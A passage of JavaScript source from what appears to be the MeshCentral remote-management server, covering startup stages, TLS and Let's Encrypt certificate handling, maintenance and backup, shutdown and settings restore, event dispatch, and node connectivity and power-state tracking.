        if (obj.dbconfig.amtWsEventSecret == null) { obj.crypto.randomBytes(32, function (err, buf) { obj.dbconfig.amtWsEventSecret = buf.toString('hex'); obj.db.Set(obj.dbconfig); }); }
        // This is used by the user to create a username/password for a Intel AMT WSMAN event subscription
        if (obj.args.getwspass) {
            if (obj.args.getwspass.length == 64) {
                obj.crypto.randomBytes(6, function (err, buf) {
                    // NOTE(review): process.nextTick() without a callback does not yield here; if
                    // amtWsEventSecret were still null this loop would spin — confirm intent.
                    while (obj.dbconfig.amtWsEventSecret == null) { process.nextTick(); }
                    var username = buf.toString('hex');
                    var nodeid = obj.args.getwspass;
                    // Derive a deterministic 12-character password from username, node id and the server secret.
                    var pass = obj.crypto.createHash('sha384').update(username.toLowerCase() + ':' + nodeid + ':' + obj.dbconfig.amtWsEventSecret).digest('base64').substring(0, 12).split('/').join('x').split('\\').join('x');
                    console.log("--- Intel(r) AMT WSMAN eventing credentials ---");
                    console.log("Username: " + username);
                    console.log("Password: " + pass);
                    console.log("Argument: " + nodeid);
                    process.exit();
                });
            } else {
                console.log("Invalid NodeID.");
                process.exit();
            }
            return;
        }
        // Start plugin manager if configuration allows this.
        if ((obj.config) && (obj.config.settings) && (obj.config.settings.plugins != null) && (obj.config.settings.plugins != false) && ((typeof obj.config.settings.plugins != 'object') || (obj.config.settings.plugins.enabled != false))) {
            const nodeVersion = Number(process.version.match(/^v(\d+\.\d+)/)[1]);
            if (nodeVersion < 7) {
                addServerWarning("Plugin support requires Node v7.x or higher.");
                delete obj.config.settings.plugins;
            } else {
                obj.pluginHandler = require('./pluginHandler.js').pluginHandler(obj);
            }
        }
        // Load the default meshcore and meshcmd
        obj.updateMeshCore();
        obj.updateMeshCmd();
        // Setup and start the redirection server if needed. We must start the redirection server before Let's Encrypt.
        if ((obj.args.redirport != null) && (typeof obj.args.redirport == 'number') && (obj.args.redirport != 0)) {
            obj.redirserver = require('./redirserver.js').CreateRedirServer(obj, obj.db, obj.args, obj.StartEx2);
        } else {
            obj.StartEx2(); // If not needed, move on.
        }
    });
}
// Done starting the redirection server, go on to load the server certificates
obj.StartEx2 = function () {
    // Third startup stage: load/generate the server TLS certificates, optionally
    // replacing them via Let's Encrypt, then continue with StartEx3(certs).
    obj.certificateOperations = require('./certoperations.js').CertificateOperations(obj);
    obj.certificateOperations.GetMeshServerCertificate(obj.args, obj.config, function (certs) {
        // Get the current node version
        const nodeVersion = Number(process.version.match(/^v(\d+\.\d+)/)[1]);
        // Let's Encrypt requires a configuration section, the redirection server (for the
        // HTTP challenge) and Node 8+; otherwise use the configured certificates directly.
        if ((obj.config.letsencrypt == null) || (obj.redirserver == null) || (nodeVersion < 8)) {
            obj.StartEx3(certs); // Just use the configured certificates
        } else if ((obj.config.letsencrypt != null) && (obj.config.letsencrypt.nochecks == true)) {
            // Use Let's Encrypt with no checking
            obj.letsencrypt = require('./letsencrypt.js').CreateLetsEncrypt(obj);
            obj.letsencrypt.getCertificate(certs, obj.StartEx3); // Use Let's Encrypt with no checking, use at your own risk.
        } else {
            // Check Let's Encrypt settings
            var leok = true;
            if (typeof obj.config.letsencrypt.email != 'string') { leok = false; addServerWarning("Missing Let's Encrypt email address."); }
            else if (typeof obj.config.letsencrypt.names != 'string') { leok = false; addServerWarning("Invalid Let's Encrypt host names."); }
            else if (obj.config.letsencrypt.names.indexOf('*') >= 0) { leok = false; addServerWarning("Invalid Let's Encrypt names, can't contain a *."); }
            else if (obj.config.letsencrypt.email.split('@').length != 2) { leok = false; addServerWarning("Invalid Let's Encrypt email address."); }
            else if (obj.config.letsencrypt.email.trim() !== obj.config.letsencrypt.email) { leok = false; addServerWarning("Invalid Let's Encrypt email address."); }
            else {
                var le = require('./letsencrypt.js');
                try { obj.letsencrypt = le.CreateLetsEncrypt(obj); } catch (ex) { console.log(ex); }
                if (obj.letsencrypt == null) { addServerWarning("Unable to setup Let's Encrypt module."); leok = false; }
            }
            if (leok == true) {
                // Check that the email address domain MX resolves.
                require('dns').resolveMx(obj.config.letsencrypt.email.split('@')[1], function (err, addresses) {
                    if (err == null) {
                        // Check that all names resolve
                        checkResolveAll(obj.config.letsencrypt.names.split(','), function (err) {
                            if (err == null) {
                                obj.letsencrypt.getCertificate(certs, obj.StartEx3); // Use Let's Encrypt
                            } else {
                                for (var i in err) { addServerWarning("Invalid Let's Encrypt names, unable to resolve: " + err[i]); }
                                obj.StartEx3(certs); // Let's Encrypt did not load, just use the configured certificates
                            }
                        });
                    } else {
                        addServerWarning("Invalid Let's Encrypt email address, unable to resolve: " + obj.config.letsencrypt.email.split('@')[1]);
                        obj.StartEx3(certs); // Let's Encrypt did not load, just use the configured certificates
                    }
                });
            } else {
                obj.StartEx3(certs); // Let's Encrypt did not load, just use the configured certificates
            }
        }
    });
};
// Start the server with the given certificates, but check if we have web certificates to load
obj.StartEx3 = function (certs) {
    // Record the server certificates and prime the crypto accelerators with them.
    obj.certificates = certs;
    obj.certificateOperations.acceleratorStart(certs); // Set the state of the accelerators
    // Walk every configured domain: load its Intel AMT ACM activation certificates
    // and normalize any per-domain web certificate URL.
    for (var domainid in obj.config.domains) {
        var domain = obj.config.domains[domainid];
        obj.certificateOperations.loadIntelAmtAcmCerts(domain.amtacmactivation);
        if (typeof domain.certurl != 'string') { continue; }
        // A certurl means at least one domain fetches its web certificate remotely,
        // so enable proxy certificate requests server-wide.
        obj.supportsProxyCertificatesRequest = true;
        // Prefix 'https://' when no scheme was supplied.
        if (domain.certurl.indexOf('://') < 0) { domain.certurl = 'https://' + domain.certurl; }
    }
    if (obj.supportsProxyCertificatesRequest == true) { obj.updateProxyCertificates(true); }
    obj.StartEx4(); // Keep going
}
// Start the server with the given certificates
obj.StartEx4 = function () {
var i;
// If the certificate is un-configured, force LAN-only mode
if (obj.certificates.CommonName.indexOf('.') == -1) { /*console.log('Server name not configured, running in LAN-only mode.');*/ obj.args.lanonly = true; }
// Write server version and run mode
var productionMode = (process.env.NODE_ENV && (process.env.NODE_ENV == 'production'));
var runmode = (obj.args.lanonly ? 2 : (obj.args.wanonly ? 1 : 0));
console.log("MeshCentral v" + getCurrentVerion() + ', ' + (["Hybrid (LAN + WAN) mode", "WAN mode", "LAN mode"][runmode]) + (productionMode ? ", Production mode." : '.'));
// Check that no sub-domains have the same DNS as the parent
for (i in obj.config.domains) {
if ((obj.config.domains[i].dns != null) && (obj.certificates.CommonName.toLowerCase() === obj.config.domains[i].dns.toLowerCase())) {
console.log("ERROR: Server sub-domain can't have same DNS name as the parent."); process.exit(0); return;
}
}
// Load the list of mesh agents and install scripts
if (obj.args.noagentupdate == 1) { for (i in obj.meshAgentsArchitectureNumbers) { obj.meshAgentsArchitectureNumbers[i].update = false; } }
obj.updateMeshAgentsTable(function () {
obj.updateMeshAgentInstallScripts();
// Setup and start the web server
obj.crypto.randomBytes(48, function (err, buf) {
// Setup Mesh Multi-Server if needed
obj.multiServer = require('./multiserver.js').CreateMultiServer(obj, obj.args);
if (obj.multiServer != null) {
if ((obj.db.databaseType != 3) || (obj.db.changeStream != true)) { console.log("ERROR: Multi-server support requires use of MongoDB with ReplicaSet and ChangeStream enabled."); process.exit(0); return; }
obj.serverId = obj.multiServer.serverid;
for (var serverid in obj.config.peers.servers) { obj.peerConnectivityByNode[serverid] = {}; }
}
// If the server is set to "nousers", allow only loopback unless IP filter is set
if ((obj.args.nousers == true) && (obj.args.userallowedip == null)) { obj.args.userallowedip = "::1,127.0.0.1"; }
// Set the session length to 60 minutes if not set and set a random key if needed
if ((obj.args.sessiontime != null) && ((typeof obj.args.sessiontime != 'number') || (obj.args.sessiontime < 1))) { delete obj.args.sessiontime; }
if (!obj.args.sessionkey) { obj.args.sessionkey = buf.toString('hex').toUpperCase(); }
// Create APF server to hook into webserver
obj.apfserver = require('./apfserver.js').CreateApfServer(obj, obj.db, obj.args);
// Create MQTT Broker to hook into webserver and mpsserver
if ((typeof obj.config.settings.mqtt == 'object') && (typeof obj.config.settings.mqtt.auth == 'object') && (typeof obj.config.settings.mqtt.auth.keyid == 'string') && (typeof obj.config.settings.mqtt.auth.key == 'string')) { obj.mqttbroker = require("./mqttbroker.js").CreateMQTTBroker(obj, obj.db, obj.args); }
// Start the web server and if needed, the redirection web server.
obj.webserver = require('./webserver.js').CreateWebServer(obj, obj.db, obj.args, obj.certificates);
if (obj.redirserver != null) { obj.redirserver.hookMainWebServer(obj.certificates); }
// Setup the Intel AMT event handler
obj.amtEventHandler = require('./amtevents.js').CreateAmtEventsHandler(obj);
// Setup the Intel AMT local network scanner
if (obj.args.wanonly != true) {
obj.amtScanner = require('./amtscanner.js').CreateAmtScanner(obj).start();
obj.meshScanner = require('./meshscanner.js').CreateMeshScanner(obj).start();
}
// Setup and start the MPS server
if ((obj.args.lanonly != true) && (obj.args.mpsport !== 0)) {
obj.mpsserver = require('./mpsserver.js').CreateMpsServer(obj, obj.db, obj.args, obj.certificates);
}
// Setup and start the legacy swarm server
if ((obj.certificates.swarmserver != null) && (obj.args.swarmport !== 0)) {
if (obj.args.swarmport == null) { obj.args.swarmport = 8080; }
obj.swarmserver = require('./swarmserver.js').CreateSwarmServer(obj, obj.db, obj.args, obj.certificates);
}
// Setup email server
if ((obj.config.smtp != null) && (obj.config.smtp.host != null) && (obj.config.smtp.from != null)) {
obj.mailserver = require('./meshmail.js').CreateMeshMail(obj);
obj.mailserver.verify();
if (obj.args.lanonly == true) { addServerWarning("SMTP server has limited use in LAN mode."); }
}
// Start periodic maintenance
obj.maintenanceTimer = setInterval(obj.maintenanceActions, 1000 * 60 * 60); // Run this every hour
// Dispatch an event that the server is now running
obj.DispatchEvent(['*'], obj, { etype: 'server', action: 'started', msg: 'Server started' });
// Plugin hook. Need to run something at server startup? This is the place.
if (obj.pluginHandler) { obj.pluginHandler.callHook('server_startup'); }
// Setup the login cookie encryption key
if ((obj.config) && (obj.config.settings) && (typeof obj.config.settings.logincookieencryptionkey == 'string')) {
// We have a string, hash it and use that as a key
try { obj.loginCookieEncryptionKey = Buffer.from(obj.config.settings.logincookieencryptionkey, 'hex'); } catch (ex) { }
if ((obj.loginCookieEncryptionKey == null) || (obj.loginCookieEncryptionKey.length != 80)) { addServerWarning("Invalid \"LoginCookieEncryptionKey\" in config.json."); obj.loginCookieEncryptionKey = null; }
}
// Login cookie encryption key not set, use one from the database
if (obj.loginCookieEncryptionKey == null) {
obj.db.Get('LoginCookieEncryptionKey', function (err, docs) {
if ((docs.length > 0) && (docs[0].key != null) && (obj.args.logintokengen == null) && (docs[0].key.length >= 160)) {
obj.loginCookieEncryptionKey = Buffer.from(docs[0].key, 'hex');
} else {
obj.loginCookieEncryptionKey = obj.generateCookieKey(); obj.db.Set({ _id: 'LoginCookieEncryptionKey', key: obj.loginCookieEncryptionKey.toString('hex'), time: Date.now() });
}
});
}
// Load the invitation link encryption key from the database
obj.db.Get('InvitationLinkEncryptionKey', function (err, docs) {
if ((docs.length > 0) && (docs[0].key != null) && (docs[0].key.length >= 160)) {
obj.invitationLinkEncryptionKey = Buffer.from(docs[0].key, 'hex');
} else {
obj.invitationLinkEncryptionKey = obj.generateCookieKey(); obj.db.Set({ _id: 'InvitationLinkEncryptionKey', key: obj.invitationLinkEncryptionKey.toString('hex'), time: Date.now() });
}
});
// Start collecting server stats every 5 minutes
setInterval(function () {
obj.serverStatsCounter++;
var hours = 720; // Start with all events lasting 30 days.
if (((obj.serverStatsCounter) % 2) == 1) { hours = 3; } // Half of the event get removed after 3 hours.
else if ((Math.floor(obj.serverStatsCounter / 2) % 2) == 1) { hours = 8; } // Another half of the event get removed after 8 hours.
else if ((Math.floor(obj.serverStatsCounter / 4) % 2) == 1) { hours = 24; } // Another half of the event get removed after 24 hours.
else if ((Math.floor(obj.serverStatsCounter / 8) % 2) == 1) { hours = 48; } // Another half of the event get removed after 48 hours.
else if ((Math.floor(obj.serverStatsCounter / 16) % 2) == 1) { hours = 72; } // Another half of the event get removed after 72 hours.
var expire = new Date();
expire.setTime(expire.getTime() + (60 * 60 * 1000 * hours));
var data = {
time: new Date(),
expire: expire,
mem: process.memoryUsage(),
//cpu: process.cpuUsage(),
conn: {
ca: Object.keys(obj.webserver.wsagents).length,
cu: Object.keys(obj.webserver.wssessions).length,
us: Object.keys(obj.webserver.wssessions2).length,
rs: obj.webserver.relaySessionCount
}
};
if (obj.mpsserver != null) { data.conn.am = Object.keys(obj.mpsserver.ciraConnections).length; }
if (obj.firstStats === true) { delete obj.firstStats; data.first = true; }
obj.db.SetServerStats(data); // Save the stats to the database
obj.DispatchEvent(['*'], obj, { action: 'servertimelinestats', data: data }); // Event the server stats
}, 300000);
obj.debug('main', "Server started");
if (obj.args.nousers == true) { obj.updateServerState('nousers', '1'); }
obj.updateServerState('state', "running");
// Setup auto-backup defaults
if (obj.config.settings.autobackup == null) { obj.config.settings.autobackup = { backupintervalhours: 24, keeplastdaysbackup: 10 }; }
else if (obj.config.settings.autobackup === false) { delete obj.config.settings.autobackup; }
// Setup users that can see all device groups
obj.config.settings.managealldevicegroups = [];
for (i in obj.config.domains) { if (Array.isArray(obj.config.domains[i].managealldevicegroups)) { for (var j in obj.config.domains[i].managealldevicegroups) { if (typeof obj.config.domains[i].managealldevicegroups[j] == 'string') { obj.config.settings.managealldevicegroups.push('user/' + i + '/' + obj.config.domains[i].managealldevicegroups[j]); } } } }
});
});
};
// Refresh any certificate hashs from the reverse proxy
obj.pendingProxyCertificatesRequests = 0;
obj.lastProxyCertificatesRequest = null;
obj.supportsProxyCertificatesRequest = false;
obj.updateProxyCertificates = function (force) {
if (force !== true) {
if ((obj.pendingProxyCertificatesRequests > 0) || (obj.supportsProxyCertificatesRequest == false)) return;
if ((obj.lastProxyCertificatesRequest != null) && ((Date.now() - obj.lastProxyCertificatesRequest) < 120000)) return; // Don't allow this call more than every 2 minutes.
obj.lastProxyCertificatesRequest = Date.now();
}
// Load any domain web certificates
for (var i in obj.config.domains) {
if (obj.config.domains[i].certurl != null) {
// Load web certs
obj.pendingProxyCertificatesRequests++;
var dnsname = obj.config.domains[i].dns;
if ((dnsname == null) && (obj.config.settings.cert != null)) { dnsname = obj.config.settings.cert; }
obj.certificateOperations.loadCertificate(obj.config.domains[i].certurl, dnsname, obj.config.domains[i], function (url, cert, xhostname, xdomain) {
obj.pendingProxyCertificatesRequests--;
if (cert != null) {
// Hash the entire cert
var hash = obj.crypto.createHash('sha384').update(Buffer.from(cert, 'binary')).digest('hex');
if (xdomain.certhash != hash) { // The certificate has changed.
xdomain.certkeyhash = hash;
xdomain.certhash = hash;
try {
// Decode a RSA certificate and hash the public key, if this is not RSA, skip this.
var forgeCert = obj.certificateOperations.forge.pki.certificateFromAsn1(obj.certificateOperations.forge.asn1.fromDer(cert));
xdomain.certkeyhash = obj.certificateOperations.forge.pki.getPublicKeyFingerprint(forgeCert.publicKey, { md: obj.certificateOperations.forge.md.sha384.create(), encoding: 'hex' });
//console.log('V1: ' + xdomain.certkeyhash);
} catch (ex) {
delete xdomain.certkeyhash;
}
if (obj.webserver) {
obj.webserver.webCertificateHashs[xdomain.id] = obj.webserver.webCertificateFullHashs[xdomain.id] = Buffer.from(hash, 'hex').toString('binary');
if (xdomain.certkeyhash != null) { obj.webserver.webCertificateHashs[xdomain.id] = Buffer.from(xdomain.certkeyhash, 'hex').toString('binary'); }
// Disconnect all agents with bad web certificates
for (var i in obj.webserver.wsagentsWithBadWebCerts) { obj.webserver.wsagentsWithBadWebCerts[i].close(1); }
}
console.log(obj.common.format("Loaded web certificate from \"{0}\", host: \"{1}\"", url, xhostname));
console.log(obj.common.format(" SHA384 cert hash: {0}", xdomain.certhash));
if ((xdomain.certkeyhash != null) && (xdomain.certhash != xdomain.certkeyhash)) { console.log(obj.common.format(" SHA384 key hash: {0}", xdomain.certkeyhash)); }
}
} else {
console.log(obj.common.format("Failed to load web certificate at: \"{0}\", host: \"{1}\"", url, xhostname));
}
});
}
}
}
// Perform maintenance operations (called every hour)
obj.maintenanceActions = function () {
// Check for self-update that targets a specific version
if ((typeof obj.args.selfupdate == 'string') && (getCurrentVerion() === obj.args.selfupdate)) { obj.args.selfupdate = false; }
// Check if we need to perform server self-update
if ((obj.args.selfupdate) && (obj.serverSelfWriteAllowed == true)) {
obj.db.getValueOfTheDay('performSelfUpdate', 1, function (performSelfUpdate) {
if (performSelfUpdate.value > 0) {
performSelfUpdate.value--;
obj.db.Set(performSelfUpdate);
obj.getLatestServerVersion(function (currentVer, latestVer) { if (currentVer != latestVer) { obj.performServerUpdate(); return; } });
} else {
checkAutobackup();
}
});
} else {
checkAutobackup();
}
};
// Check if we need to perform an automatic backup
function checkAutobackup() {
if (obj.config.settings.autobackup && (typeof obj.config.settings.autobackup.backupintervalhours == 'number')) {
obj.db.Get('LastAutoBackupTime', function (err, docs) {
if (err != null) return;
var lastBackup = 0, now = new Date().getTime();
if (docs.length == 1) { lastBackup = docs[0].value; }
var delta = now - lastBackup;
if (delta > (obj.config.settings.autobackup.backupintervalhours * 60 * 60 * 1000)) {
// A new auto-backup is required.
obj.db.Set({ _id: 'LastAutoBackupTime', value: now }); // Save the current time in the database
obj.db.performBackup(); // Perform the backup
}
});
}
}
// Stop the Meshcentral server
obj.Stop = function (restoreFile) {
// If the database is not setup, exit now.
if (!obj.db) return;
// Dispatch an event saying the server is now stopping
obj.DispatchEvent(['*'], obj, { etype: 'server', action: 'stopped', msg: "Server stopped" });
// Set all nodes to power state of unknown (0)
obj.db.storePowerEvent({ time: new Date(), nodeid: '*', power: 0, s: 2 }, obj.multiServer, function () { // s:2 indicates that the server is shutting down.
if (restoreFile) {
obj.debug('main', obj.common.format("Server stopped, updating settings: {0}", restoreFile));
console.log("Updating settings folder...");
var yauzl = require('yauzl');
yauzl.open(restoreFile, { lazyEntries: true }, function (err, zipfile) {
if (err) throw err;
zipfile.readEntry();
zipfile.on('entry', function (entry) {
if (/\/$/.test(entry.fileName)) {
// Directory file names end with '/'.
// Note that entires for directories themselves are optional.
// An entry's fileName implicitly requires its parent directories to exist.
zipfile.readEntry();
} else {
// file entry
zipfile.openReadStream(entry, function (err, readStream) {
if (err) throw err;
readStream.on('end', function () { zipfile.readEntry(); });
// console.log('Extracting:', obj.getConfigFilePath(entry.fileName));
readStream.pipe(obj.fs.createWriteStream(obj.getConfigFilePath(entry.fileName)));
});
}
});
zipfile.on('end', function () { setTimeout(function () { obj.fs.unlinkSync(restoreFile); process.exit(123); }); });
});
} else {
obj.debug('main', "Server stopped");
process.exit(0);
}
});
// Update the server state
obj.updateServerState('state', "stopped");
};
// Event Dispatch
obj.AddEventDispatch = function (ids, target) {
obj.debug('dispatch', 'AddEventDispatch', ids);
for (var i in ids) { var id = ids[i]; if (!obj.eventsDispatch[id]) { obj.eventsDispatch[id] = [target]; } else { obj.eventsDispatch[id].push(target); } }
};
obj.RemoveEventDispatch = function (ids, target) {
obj.debug('dispatch', 'RemoveEventDispatch', id);
for (var i in ids) { var id = ids[i]; if (obj.eventsDispatch[id]) { var j = obj.eventsDispatch[id].indexOf(target); if (j >= 0) { if (obj.eventsDispatch[id].length == 1) { delete obj.eventsDispatch[id]; } else { obj.eventsDispatch[id].splice(j, 1); } } } }
};
obj.RemoveEventDispatchId = function (id) {
obj.debug('dispatch', 'RemoveEventDispatchId', id);
if (obj.eventsDispatch[id] != null) { delete obj.eventsDispatch[id]; }
};
obj.RemoveAllEventDispatch = function (target) {
obj.debug('dispatch', 'RemoveAllEventDispatch');
for (var i in obj.eventsDispatch) { var j = obj.eventsDispatch[i].indexOf(target); if (j >= 0) { if (obj.eventsDispatch[i].length == 1) { delete obj.eventsDispatch[i]; } else { obj.eventsDispatch[i].splice(j, 1); } } }
};
obj.DispatchEvent = function (ids, source, event, fromPeerServer) {
// If the database is not setup, exit now.
if (!obj.db) return;
// Send event to syslog is needed
if (obj.syslog && event.msg) { obj.syslog.log(obj.syslog.LOG_INFO, event.msg); }
if (obj.syslogjson) { obj.syslogjson.log(obj.syslogjson.LOG_INFO, JSON.stringify(event)); }
obj.debug('dispatch', 'DispatchEvent', ids);
if ((typeof event == 'object') && (!event.nolog)) {
event.time = new Date();
// The event we store is going to skip some of the fields so we don't store too much stuff in the database.
var storeEvent = Object.assign({}, event);
if (storeEvent.node) { delete storeEvent.node; } // Skip the "node" field. May skip more in the future.
if (storeEvent.links) {
// Escape "links" names that may have "." and/or "$"
storeEvent.links = Object.assign({}, storeEvent.links);
for (var i in storeEvent.links) { var ue = obj.common.escapeFieldName(i); if (ue !== i) { storeEvent.links[ue] = storeEvent.links[i]; delete storeEvent.links[i]; } }
}
storeEvent.ids = ids;
obj.db.StoreEvent(storeEvent);
}
var targets = []; // List of targets we dispatched the event to, we don't want to dispatch to the same target twice.
for (var j in ids) {
var id = ids[j];
if (obj.eventsDispatch[id]) {
for (var i in obj.eventsDispatch[id]) {
if (targets.indexOf(obj.eventsDispatch[id][i]) == -1) { // Check if we already displatched to this target
targets.push(obj.eventsDispatch[id][i]);
try { obj.eventsDispatch[id][i].HandleEvent(source, event, ids, id); } catch (ex) {
console.log(ex, obj.eventsDispatch[id][i]);
}
}
}
}
}
if ((fromPeerServer == null) && (obj.multiServer != null) && ((typeof event != 'object') || (event.nopeers != 1))) { obj.multiServer.DispatchEvent(ids, source, event); }
};
// Get the connection state of a node
obj.GetConnectivityState = function (nodeid) { return obj.connectivityByNode[nodeid]; };
// Get the routing server id for a given node and connection type, can never be self.
obj.GetRoutingServerId = function (nodeid, connectType) {
if (obj.multiServer == null) return null;
for (var serverid in obj.peerConnectivityByNode) {
if (serverid == obj.serverId) continue;
var state = obj.peerConnectivityByNode[serverid][nodeid];
if ((state != null) && ((state.connectivity & connectType) != 0)) { return { serverid: serverid, meshid: state.meshid }; }
}
return null;
};
// Update the connection state of a node when in multi-server mode
// Update obj.connectivityByNode using obj.peerConnectivityByNode for the list of nodes in argument
obj.UpdateConnectivityState = function (nodeids) {
for (var nodeid in nodeids) {
var meshid = null, state = null, oldConnectivity = 0, oldPowerState = 0, newConnectivity = 0, newPowerState = 0;
var oldState = obj.connectivityByNode[nodeid];
if (oldState != null) { meshid = oldState.meshid; oldConnectivity = oldState.connectivity; oldPowerState = oldState.powerState; }
for (var serverid in obj.peerConnectivityByNode) {
var peerState = obj.peerConnectivityByNode[serverid][nodeid];
if (peerState != null) {
if (state == null) {
// Copy the state
state = {};
newConnectivity = state.connectivity = peerState.connectivity;
newPowerState = state.powerState = peerState.powerState;
meshid = state.meshid = peerState.meshid;
//if (peerState.agentPower) { state.agentPower = peerState.agentPower; }
//if (peerState.ciraPower) { state.ciraPower = peerState.ciraPower; }
//if (peerState.amtPower) { state.amtPower = peerState.amtPower; }
} else {
// Merge the state
state.connectivity |= peerState.connectivity;
newConnectivity = state.connectivity;
if ((peerState.powerState != 0) && ((state.powerState == 0) || (peerState.powerState < state.powerState))) { newPowerState = state.powerState = peerState.powerState; }
meshid = state.meshid = peerState.meshid;
//if (peerState.agentPower) { state.agentPower = peerState.agentPower; }
//if (peerState.ciraPower) { state.ciraPower = peerState.ciraPower; }
//if (peerState.amtPower) { state.amtPower = peerState.amtPower; }
}
}
}
obj.connectivityByNode[nodeid] = state;
//console.log('xx', nodeid, meshid, newConnectivity, oldPowerState, newPowerState, oldPowerState);
// Event any changes on this server only
if ((newConnectivity != oldPowerState) || (newPowerState != oldPowerState)) {
obj.DispatchEvent(obj.webserver.CreateNodeDispatchTargets(meshid, nodeid), obj, { action: 'nodeconnect', meshid: meshid, nodeid: nodeid, domain: nodeid.split('/')[1], conn: newConnectivity, pwr: newPowerState, nolog: 1, nopeers: 1 });
}
}
};
// Set the connectivity state of a node and setup the server so that messages can be routed correctly.
// meshId: mesh identifier of format mesh/domain/meshidhex
// nodeId: node identifier of format node/domain/nodeidhex
// connectTime: time of connection, milliseconds elapsed since the UNIX epoch.
// connectType: Bitmask, 1 = MeshAgent, 2 = Intel AMT CIRA, 4 = Intel AMT local, 8 = Intel AMT Relay, 16 = MQTT
// powerState: Value, 0 = Unknown, 1 = S0 power on, 2 = S1 Sleep, 3 = S2 Sleep, 4 = S3 Sleep, 5 = S4 Hibernate, 6 = S5 Soft-Off, 7 = Present
//var connectTypeStrings = ['', 'MeshAgent', 'Intel AMT CIRA', '', 'Intel AMT local', '', '', '', 'Intel AMT Relay', '', '', '', '', '', '', '', 'MQTT'];
//var powerStateStrings = ['Unknown', 'Powered', 'Sleep', 'Sleep', 'Deep Sleep', 'Hibernating', 'Soft-Off', 'Present'];
obj.SetConnectivityState = function (meshid, nodeid, connectTime, connectType, powerState, serverid) {
//console.log('SetConnectivity for ' + nodeid.substring(0, 16) + ', Type: ' + connectTypeStrings[connectType] + ', Power: ' + powerStateStrings[powerState] + (serverid == null ? ('') : (', ServerId: ' + serverid)));
if ((serverid == null) && (obj.multiServer != null)) { obj.multiServer.DispatchMessage({ action: 'SetConnectivityState', meshid: meshid, nodeid: nodeid, connectTime: connectTime, connectType: connectType, powerState: powerState }); }
if (obj.multiServer == null) {
// Single server mode
// Change the node connection state
var eventConnectChange = 0;
var state = obj.connectivityByNode[nodeid];
if (state) {
// Change the connection in the node and mesh state lists
if ((state.connectivity & connectType) == 0) { state.connectivity |= connectType; eventConnectChange = 1; }
state.meshid = meshid;
} else {
// Add the connection to the node and mesh state list
obj.connectivityByNode[nodeid] = state = { connectivity: connectType, meshid: meshid };
eventConnectChange = 1;
}
// Set node power state
if (connectType == 1) { state.agentPower = powerState; } else if (connectType == 2) { state.ciraPower = powerState; } else if (connectType == 4) { state.amtPower = powerState; }
var powerState = 0, oldPowerState = state.powerState;
if ((state.connectivity & 1) != 0) { powerState = state.agentPower; } else if ((state.connectivity & 2) != 0) { powerState = state.ciraPower; } else if ((state.connectivity & 4) != 0) { powerState = state.amtPower; }
if ((state.powerState == null) || (state.powerState != powerState)) {
state.powerState = powerState;
eventConnectChange = 1;
// Set new power state in database
var record = { time: new Date(connectTime), nodeid: nodeid, power: powerState };
if (oldPowerState != null) { record.oldPower = oldPowerState; }
obj.db.storePowerEvent(record, obj.multiServer);
}
// Event the node connection change
if (eventConnectChange == 1) {
obj.DispatchEvent(obj.webserver.CreateNodeDispatchTargets(meshid, nodeid), obj, { action: 'nodeconnect', meshid: meshid, nodeid: nodeid, domain: nodeid.split('/')[1], conn: state.connectivity, pwr: state.powerState, ct: connectTime, nolog: 1, nopeers: 1 });
}
} else {
// Multi server mode
// Change the node connection state
if (serverid == null) { serverid = obj.serverId; }
if (obj.peerConnectivityByNode[serverid] == null) return; // Guard against unknown serverid's
var state = obj.peerConnectivityByNode[serverid][nodeid];
if (state) {
// Change the connection in the node and mesh state lists
if ((state.connectivity & connectType) == 0) { state.connectivity |= connectType; }
state.meshid = meshid;
} else {
// Add the connection to the node and mesh state list
obj.peerConnectivityByNode[serverid][nodeid] = state = { connectivity: connectType, meshid: meshid };
}
// Set node power state
if (connectType == 1) { state.agentPower = powerState; } else if (connectType == 2) { state.ciraPower = powerState; } else if (connectType == 4) { state.amtPower = powerState; }
var powerState = 0, oldPowerState = state.powerState;
if ((state.connectivity & 1) != 0) { powerState = state.agentPower; } else if ((state.connectivity & 2) != 0) { powerState = state.ciraPower; } else if ((state.connectivity & 4) != 0) { powerState = state.amtPower; }
if ((state.powerState == null) || (state.powerState != powerState)) {
state.powerState = powerState;
// Set new power state in database
var record = { time: new Date(connectTime), nodeid: nodeid, power: powerState, server: obj.multiServer.serverid };
if (oldPowerState != null) { record.oldPower = oldPowerState; }
obj.db.storePowerEvent(record, obj.multiServer);
}
// Update the combined node state
var x = {}; x[nodeid] = 1;
obj.UpdateConnectivityState(x);
}
};
// Clear the connectivity state of a node and setup the server so that messages can be routed correctly.
// meshId: mesh identifier of format mesh/domain/meshidhex
// nodeId: node identifier of format node/domain/nodeidhex
// connectType: Bitmask, 1 = MeshAgent, 2 = Intel AMT CIRA, 3 = Intel AMT local.
obj.ClearConnectivityState = function (meshid, nodeid, connectType, serverid) {
//console.log('ClearConnectivity for ' + nodeid.substring(0, 16) + ', Type: ' + connectTypeStrings[connectType] + (serverid == null?(''):(', ServerId: ' + serverid)));
if ((serverid == null) && (obj.multiServer != null)) { obj.multiServer.DispatchMessage({ action: 'ClearConnectivityState', meshid: meshid, nodeid: nodeid, connectType: connectType }); }
if (obj.multiServer == null) {
// Single server mode
var eventConnectChange = 0;
// Remove the agent connection from the nodes connection list
var state = obj.connectivityByNode[nodeid];
if (state == null) return;
if ((state.connectivity & connectType) != 0) {
state.connectivity -= connectType;
// If the node is completely disconnected, clean it up completely
if (state.connectivity == 0) { delete obj.connectivityByNode[nodeid]; }
eventConnectChange = 1;
}
// Clear node power state
var oldPowerState = state.powerState, powerState = 0;
if (connectType == 1) { state.agentPower = 0; } else if (connectType == 2) { state.ciraPower = 0; } else if (connectType == 4) { state.amtPower = 0; }
if ((state.connectivity & 1) != 0) { powerState = state.agentPower; } else if ((state.connectivity & 2) != 0) { powerState = state.ciraPower; } else if ((state.connectivity & 4) != 0) { powerState = state.amtPower; }
if ((state.powerState == null) || (state.powerState != powerState)) {
state.powerState = powerState;
eventConnectChange = 1;
// Set new power state in database
obj.db.storePowerEvent({ time: new Date(), nodeid: nodeid, power: powerState, oldPower: oldPowerState }, obj.multiServer);
}
// Event the node connection change
if (eventConnectChange == 1) { obj.DispatchEvent(obj.webserver.CreateNodeDispatchTargets(meshid, nodeid), obj, { action: 'nodeconnect', meshid: meshid, nodeid: nodeid, domain: nodeid.split('/')[1], conn: state.connectivity, pwr: state.powerState, nolog: 1, nopeers: 1 }); }
} else {
// Multi server mode
// Remove the agent connection from the nodes connection list
if (serverid == null) { serverid = obj.serverId; }
if (obj.peerConnectivityByNode[serverid] == null) return; // Guard against unknown serverid's
